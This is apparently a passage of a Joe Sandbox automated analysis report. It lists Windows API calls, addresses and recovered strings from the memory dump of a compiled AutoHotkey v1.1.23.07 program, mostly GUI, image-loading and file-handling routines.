    • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
    • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C
      • Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
      • Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
      • Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
      • Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511
      • Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22
    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462
      • Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
      • Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetCurrentProcessId.KERNEL32 ref: 00435149
      • Part of subcall function 00452810: GetModuleHandleA.KERNEL32(kernel32,CreateToolhelp32Snapshot,?,?,?,00000000), ref: 00452840
      • Part of subcall function 00452810: GetProcAddress.KERNEL32(00000000,?,?,?,00000000), ref: 00452843
      • Part of subcall function 00452810: GetModuleHandleA.KERNEL32(kernel32,Process32First,?,?,?,00000000), ref: 00452867
      • Part of subcall function 00452810: GetProcAddress.KERNEL32(00000000,?,?,?,00000000), ref: 0045286A
      • Part of subcall function 00452810: GetModuleHandleA.KERNEL32(kernel32,Process32Next,?,?,?,00000000), ref: 0045288E
      • Part of subcall function 00452810: GetProcAddress.KERNEL32(00000000,?,?,?,00000000), ref: 00452891
      • Part of subcall function 00452810: __wsplitpath.LIBCMT ref: 00452949
      • Part of subcall function 00452810: CloseHandle.KERNEL32(00000000), ref: 004529BA
      • Part of subcall function 00452810: CloseHandle.KERNEL32(00000000), ref: 004529CE
      • Part of subcall function 00452810: CloseHandle.KERNEL32(00000000), ref: 004529E2
    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000), ref: 00435186
    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00435195
    • CloseHandle.KERNEL32(00000000), ref: 0043519E
      • Part of subcall function 00486FE5: __mbctoupper_l.LIBCMT ref: 00486FEF
    • GetCurrentProcessId.KERNEL32 ref: 00435244
    • OpenProcess.KERNEL32(00000200,00000000,00000000), ref: 0043525C
    • SetPriorityClass.KERNEL32(00000000,00008000), ref: 0043526E
    • GetTickCount.KERNEL32 ref: 004352B7
    • GetTickCount.KERNEL32 ref: 004352F8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetModuleFileNameW.KERNEL32(00000000,004A8182,00000104,00000001,00000000,004011C4), ref: 0048942A
      • Part of subcall function 00489164: GetCurrentProcess.KERNEL32(C0000417,004719BE,004011C4), ref: 0048917A
      • Part of subcall function 00489164: TerminateProcess.KERNEL32(00000000), ref: 00489181
    • _wcslen.LIBCMT ref: 00489459
    • _wcslen.LIBCMT ref: 00489466
      • Part of subcall function 0048E204: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0048E23F
      • Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 0048E25B
      • Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 0048E279
      • Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0048E289
      • Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 0048E299
      • Part of subcall function 0048E204: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 0048E2AD
    • GetStdHandle.KERNEL32(000000F4,00000001,00000000,004011C4), ref: 004894DC
    • _strlen.LIBCMT ref: 00489519
    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00489528
      • Part of subcall function 0048B884: IsDebuggerPresent.KERNEL32 ref: 00490272
      • Part of subcall function 0048B884: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00490287
      • Part of subcall function 0048B884: UnhandledExceptionFilter.KERNEL32(004987AC), ref: 00490292
      • Part of subcall function 0048B884: GetCurrentProcess.KERNEL32(C0000409), ref: 004902AE
      • Part of subcall function 0048B884: TerminateProcess.KERNEL32(00000000), ref: 004902B5
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • LoadLibraryA.KERNEL32(uxtheme), ref: 0046680F
    • GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466821
    • FreeLibrary.KERNEL32(00000000,?,000000CB,?,?,?,0000000B,00000000,00000000), ref: 00466839
    • SendMessageA.USER32(?,00000406,?,?), ref: 00466891
    • SendMessageA.USER32(?,00000409,00000000,FF000000), ref: 004668AA
    • SendMessageA.USER32(?,00002001,00000000,?), ref: 004668C7
      • Part of subcall function 00466910: GetWindowRect.USER32(?,?), ref: 0046694A
      • Part of subcall function 00466910: GetWindowRect.USER32(?,?), ref: 00466954
      • Part of subcall function 00466910: IntersectRect.USER32(?,?,?), ref: 00466965
    • GetSysColor.USER32(0000000F), ref: 004668E2
    • SendMessageA.USER32(?,00002001,00000000,?), ref: 004668F8
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
    • GetWindowLongA.USER32(?,000000F0), ref: 004626AD
    • SendMessageA.USER32(?,?,00000000,?), ref: 00462736
    • SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
    • SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
    • SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
    • GetWindowLongA.USER32(?,000000F0), ref: 0046280A
    • SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
    • SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
    • SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
    • SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00472EC0: __Stoull.NTSTC_LIBCMT ref: 00472F17
      • Part of subcall function 00472EC0: __Stoull.NTSTC_LIBCMT ref: 00472F33
      • Part of subcall function 00472EC0: LoadLibraryA.KERNEL32(gdiplus), ref: 00473151
      • Part of subcall function 00472EC0: LoadImageA.USER32(00000000,?,?,?,?,00002010), ref: 004731AF
      • Part of subcall function 00472EC0: GetFileAttributesA.KERNEL32(?), ref: 004731D0
      • Part of subcall function 00472EC0: LoadLibraryA.KERNEL32(gdiplus), ref: 0047328C
      • Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 004732A4
      • Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 004732AE
      • Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromFile), ref: 004732BA
      • Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdipCreateHBITMAPFromBitmap), ref: 004732C4
      • Part of subcall function 00472EC0: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 004732D0
      • Part of subcall function 00472EC0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00473317
      • Part of subcall function 00472EC0: FreeLibrary.KERNEL32(00000000), ref: 0047335D
      • Part of subcall function 00472EC0: GetIconInfo.USER32(?,?), ref: 0047338B
      • Part of subcall function 00472EC0: GetObjectA.GDI32(?,00000018,?), ref: 004733A5
      • Part of subcall function 00472EC0: DeleteObject.GDI32(?), ref: 004733F9
      • Part of subcall function 00472EC0: DeleteObject.GDI32(?), ref: 00473400
      • Part of subcall function 00472EC0: DestroyCursor.USER32(?), ref: 0047341D
      • Part of subcall function 00472EC0: LoadImageA.USER32(00000000,?,?,?,?,00000010), ref: 00473434
      • Part of subcall function 00472EC0: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00473455
      • Part of subcall function 00472EC0: GetFileSize.KERNEL32(00000000,00000000), ref: 00473469
      • Part of subcall function 00472EC0: GlobalAlloc.KERNEL32(00000002,00000000), ref: 00473476
      • Part of subcall function 00472EC0: CloseHandle.KERNEL32(00000000), ref: 00473483
      • Part of subcall function 00472EC0: GlobalFix.KERNEL32(00000000), ref: 00473497
      • Part of subcall function 00472EC0: CloseHandle.KERNEL32(00000000), ref: 004734A2
      • Part of subcall function 00472EC0: GlobalFree.KERNEL32(00000000), ref: 004734A9
      • Part of subcall function 00472EC0: ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 004734CA
      • Part of subcall function 00472EC0: GlobalUnWire.KERNEL32(00000000), ref: 004734D1
      • Part of subcall function 00472EC0: CloseHandle.KERNEL32(00000000), ref: 004734D8
      • Part of subcall function 00472EC0: CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 004734E6
      • Part of subcall function 00472EC0: OleLoadPicture.OLEAUT32(?,00000000,00000000,004967D0,00000000), ref: 00473507
      • Part of subcall function 00472EC0: GlobalFree.KERNEL32(00000000), ref: 00473526
      • Part of subcall function 00472EC0: DestroyCursor.USER32(?), ref: 0047359B
      • Part of subcall function 00472EC0: CopyImage.USER32(?,00000000,?,?,00000000), ref: 004735DE
      • Part of subcall function 00472EC0: CopyImage.USER32(?,?,?,?,0000000C), ref: 0047364C
    • SendMessageA.USER32(?,00000172,00000002,00000000), ref: 004628FE
    • DestroyCursor.USER32(00000000), ref: 00462901
    • SendMessageA.USER32(?,00000172,00000000,00000000), ref: 00462913
    • DeleteObject.GDI32(00000000), ref: 00462916
    • DestroyCursor.USER32(?), ref: 004629CC
      • Part of subcall function 00473980: GetIconInfo.USER32(?,?), ref: 00473991
      • Part of subcall function 00473980: GetObjectA.GDI32(?,00000018,?), ref: 004739B6
      • Part of subcall function 00473980: CreateCompatibleDC.GDI32(00000000), ref: 004739CC
      • Part of subcall function 00473980: CreateDIBSection.GDI32(00000000,?,00000000,?,00000000,00000000), ref: 00473A20
      • Part of subcall function 00473980: SelectObject.GDI32(00000000,00000000), ref: 00473A33
      • Part of subcall function 00473980: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000003), ref: 00473A57
      • Part of subcall function 00473980: GdiFlush.GDI32 ref: 00473A5D
      • Part of subcall function 00473980: GetDIBits.GDI32(?,00000000,00000000,?,?,00000028,00000000), ref: 00473A9E
      • Part of subcall function 00473980: SelectObject.GDI32(?,?), ref: 00473AD5
      • Part of subcall function 00473980: SelectObject.GDI32(?,?), ref: 00473AF6
      • Part of subcall function 00473980: DeleteObject.GDI32(00000000), ref: 00473B02
      • Part of subcall function 00473980: GetLastError.KERNEL32(?,00000000), ref: 00473B0F
      • Part of subcall function 00473980: DeleteDC.GDI32(00000000), ref: 00473B16
      • Part of subcall function 00473980: DeleteObject.GDI32(?), ref: 00473B26
      • Part of subcall function 00473980: DeleteObject.GDI32(00000000), ref: 00473B2C
      • Part of subcall function 00473980: DestroyCursor.USER32(00000000), ref: 00473B38
    • DestroyCursor.USER32(?), ref: 00462950
    • GetWindowLongA.USER32(?,000000F0), ref: 00462960
    • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00462990
    • SendMessageA.USER32(?,00000172,?,?), ref: 004629A3
    • SendMessageA.USER32(00000000,00000173,?,00000000), ref: 004629B0
    • DeleteObject.GDI32(?), ref: 004629C4
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • _strncpy.LIBCMT ref: 004395FD
    • _strncpy.LIBCMT ref: 0043961F
    • _strncpy.LIBCMT ref: 00439641
    • MulDiv.KERNEL32(80000000,00000060,00000060), ref: 004396FE
    • MulDiv.KERNEL32(?,00000060,00000060), ref: 00439733
    • DialogBoxParamA.USER32(00400000,000000CD,00000000,Function_000398A0,00000000), ref: 004397CB
    Strings
    • AutoHotkey v1.1.23.07, xrefs: 004395ED, 004395F7
    • The InputBox window could not be displayed., xrefs: 0043985C
    • The maximum number of InputBoxes has been reached., xrefs: 004395B7
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 00466B4D
    • ShowWindow.USER32(00000000,00000000), ref: 00466B80
    • EnableWindow.USER32(?,00000001), ref: 00466B94
    • EnableWindow.USER32(00000000,00000000), ref: 00466BA5
    • GetWindowRect.USER32(?,?), ref: 00466BB9
    • PtInRect.USER32(?,?,?), ref: 00466BD4
    • PtInRect.USER32(?,?,?), ref: 00466BE9
    • SetFocus.USER32(00000000), ref: 00466C2B
    • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00466C6F
    • SetFocus.USER32(00000000), ref: 00466C7C
    • InvalidateRect.USER32(?,00000000,00000001), ref: 00466C95
    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00466CB1
    • InvalidateRect.USER32(?,?,00000001), ref: 00466CC2
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00473B50: LoadLibraryA.KERNEL32(uxtheme), ref: 00473B5C
      • Part of subcall function 00473B50: GetProcAddress.KERNEL32(00000000,SetWindowTheme,?,?), ref: 00473B6E
      • Part of subcall function 00473B50: FreeLibrary.KERNEL32(00000000,?,?), ref: 00473B8C
    • CreateWindowExA.USER32(?,edit,?,?,?,?,?,?,?,?,00400000,00000000), ref: 0045E601
    • SendMessageA.USER32(00000000,000000CC,?,00000000), ref: 0045E630
    • SendMessageA.USER32(?,000000C5,?,00000000), ref: 0045E65A
    • SendMessageA.USER32(?,000000CB,?,?), ref: 0045E679
    • SelectObject.GDI32(?,?), ref: 0045E6AA
    • ReleaseDC.USER32(?,?), ref: 0045E6B5
    • SendMessageA.USER32(?,00000030,?,?), ref: 0045F28C
    • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0045F2A6
    • GetClientRect.USER32(?,?), ref: 0045F2EF
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F319
    • SendMessageA.USER32(?,00001328,00000001,?), ref: 0045F32F
    • SetWindowLongA.USER32(?,000000F0,?), ref: 0045F344
    • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0045F378
    • GetWindowRect.USER32(?,?), ref: 0045F38E
    • SendMessageA.USER32(?,00000194,?,00000000), ref: 0045F3E7
    • GetWindowRect.USER32(?,?), ref: 0045F40B
    • MapWindowPoints.USER32(00000000,00000013,?,00000002), ref: 0045F41E
    • InvalidateRect.USER32(00000013,?,00000000), ref: 0045F42F
    • SetWindowPos.USER32(?,?,00000000,00000000,00000000,00000000,00000013), ref: 0045F44C
      • Part of subcall function 00466470: CheckRadioButton.USER32(00000006,?,?,-00000004), ref: 004664A8
      • Part of subcall function 00466470: SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 004664F5
      • Part of subcall function 00466470: GetWindowLongA.USER32(00000000,000000F0), ref: 00466502
      • Part of subcall function 00466470: SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 00466511
      • Part of subcall function 00473E10: __ultow.LIBCMT ref: 00473E22
    • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013), ref: 0045F462
      • Part of subcall function 00462640: SendMessageA.USER32(?,00001304,00000000,00000000), ref: 0046267E
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 004626AD
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,?), ref: 00462736
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101B,?,?), ref: 00462771
      • Part of subcall function 00462640: SendMessageA.USER32(?,?,00000000,00000000), ref: 004627CD
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000108F,00000000,00000000), ref: 00462803
      • Part of subcall function 00462640: GetWindowLongA.USER32(?,000000F0), ref: 0046280A
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000101E,00000000,0000FFFE), ref: 0046282E
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000130C,?,00000000), ref: 00462850
      • Part of subcall function 00462640: SendMessageA.USER32(?,0000014E,00000001,?), ref: 0046286E
      • Part of subcall function 00462640: SendMessageA.USER32(0000014E,0000014E,?,00000000), ref: 00462880
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • LoadCursorA.USER32 ref: 0045C2A1
    • RegisterClassExA.USER32(00000000), ref: 0045C2C0
      • Part of subcall function 0045C460: _strncpy.LIBCMT ref: 0045C481
    • CreateWindowExA.USER32(?,AutoHotkeyGUI,001B2774,?,00000000,00000000,00000000,00000000,?,00000000,00400000,00000000), ref: 0045C331
    • SendMessageA.USER32(00000000,00000080,00000000,00000000), ref: 0045C371
    • SendMessageA.USER32(?,00000080,00000001,00000000), ref: 0045C37F
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • FormatMessageA.KERNEL32(00001200,00000000,?,00000000,?,00001000,00000000), ref: 00454DD1
    • _vswprintf_s.LIBCMT ref: 00454E02
    • SysFreeString.OLEAUT32(?), ref: 00454E32
    • SysFreeString.OLEAUT32(00000000), ref: 00454E38
    • SysFreeString.OLEAUT32(?), ref: 00454E3E
    Strings
    • No valid COM object!, xrefs: 00454D9C
    • 0x%08X - , xrefs: 00454DA8
    • Source:%wsDescription:%wsHelpFile:%wsHelpContext:%d, xrefs: 00454DF9
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetWindowLongA.USER32(?,000000F0), ref: 00463B17
    • SendMessageA.USER32(?,00000190,00000000,00000000), ref: 00463B34
      • Part of subcall function 00484959: RtlAllocateHeap.NTDLL(00000000,00000001,00000001), ref: 0048499E
    • SendMessageA.USER32(?,00000191,00000000,00000000), ref: 00463B63
    • __itow.LIBCMT ref: 00463BC0
    • SendMessageA.USER32(?,0000018A,?,00000000), ref: 00463C44
    • __itow.LIBCMT ref: 00463C9F
    • SendMessageA.USER32(?,00000189,?,004ABB26), ref: 00463CF0
      • Part of subcall function 004847B8: HeapFree.KERNEL32(00000000,00000000), ref: 004847CE
      • Part of subcall function 004847B8: GetLastError.KERNEL32(00000000,?,00488A13,00000000,?,0048A041,00000100,004719BE), ref: 004847E0
    • SendMessageA.USER32(?,00000188,00000000,00000000), ref: 00463D2C
    • SendMessageA.USER32(?,0000018A,00000000,00000000), ref: 00463D50
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 00451B8D
    • GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451BC8
    • GetFileAttributesA.KERNEL32(?), ref: 00451BFD
    • GetFileAttributesA.KERNEL32(?), ref: 00451C10
      • Part of subcall function 00452500: GetFullPathNameA.KERNEL32(?,00000104,?,?,757E6DBE), ref: 00452520
      • Part of subcall function 00452500: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00452565
      • Part of subcall function 00452500: __wsplitpath.LIBCMT ref: 004525AD
      • Part of subcall function 00452500: __wsplitpath.LIBCMT ref: 004525D4
    • SHFileOperation.SHELL32(00000000), ref: 00451D07
      • Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 004519FD
      • Part of subcall function 004519E0: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451A38
      • Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A6D
      • Part of subcall function 004519E0: GetFileAttributesA.KERNEL32(?), ref: 00451A80
      • Part of subcall function 004519E0: SHFileOperation.SHELL32 ref: 00451B58
      • Part of subcall function 00451D20: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 00451D37
      • Part of subcall function 00451D20: GetFileAttributesA.KERNEL32(?), ref: 00451D65
      • Part of subcall function 00451D20: RemoveDirectoryA.KERNEL32(?), ref: 00451D8C
      • Part of subcall function 00451D20: SHFileOperation.SHELL32 ref: 00451DE6
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
    • SendMessageA.USER32(?,00001002,00000001,?), ref: 0045AF1D
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004714E3
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 0047150C
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471541
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 00471572
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715A4
      • Part of subcall function 004714C0: _strncpy.LIBCMT ref: 004715D6
